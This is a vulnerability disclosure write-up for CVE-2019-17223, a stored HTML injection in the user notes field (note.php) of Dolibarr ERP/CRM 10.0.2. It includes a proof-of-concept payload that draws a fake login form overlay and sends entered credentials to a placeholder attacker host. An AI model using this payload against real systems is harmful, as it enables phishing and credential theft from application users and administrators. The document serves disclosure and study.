CVE-2019–17223 — Stored HTML Injection | Dolibarr CRM/ERP

Summary

Dolibarr ERP/CRM is a open source software for small and medium businesses, foundations or freelancers, it provides different features for enterprise resource planning and customer relationship management.

The latest version of Dolibarr provide a good mechanism of defense for script injections, but with some research in the platform I found a field that do not validate the input at all, leaving room for HTML code execution.

Description

In user dashboard, has a field to save notes, the input is not validate at all, and I was able to inject HTML code, that is stored in the application. The main problem is that all the page can be customized by injections on note.php and simply accessed by the link:
http://(IPOfApplication)/dolibarr/user/note.php?id=(user_id)

In my PoC(Proof of Concept) I craft a simple WEB login page, this page is showed by accessing the link above by the user or by principally, and more critical, the admin of the application. A complete and similar login page of the real application could be done and stored, making a good and convincing phishing since the URL is trusted and part of the application. Also this can be used for other type of attacks like session hijacking or just “defacement” of this page.

Below the vulnerable field(note.php):

Image for post
Image for post

There, I injected my simple login page, attackers could inject their own malicious HTML code like this:

<div style=’position: absolute; left: 0px; top: 0px; width: 2000px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;’>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name=’Login’ action=’http://attackerIP:port/'><table><tr><td>Username:</td><td><input type=’text’ name=’username’/></td></tr><tr><td>Password:</td><td><input type=’text’ name=’password’/></td></tr><tr><td colspan=2 align=center><input type=’submit’ value=’Login’/></td></tr></table></form></div>

Once injected, always that user visit their notes by the dashboard or by the link, the login page will be showed and the attacker can visualize the credentials on his own server:

Image for post
Image for post

This vulnerability affects the version 10.0.2 but other versions may also vulnerable.

For more:

https://snyk.io/vuln/SNYK-PHP-DOLIBARRDOLIBARR-473217

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17223
https://nvd.nist.gov/vuln/detail/CVE-2019-17223

https://www.cvedetails.com/cve/CVE-2019-17223/

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store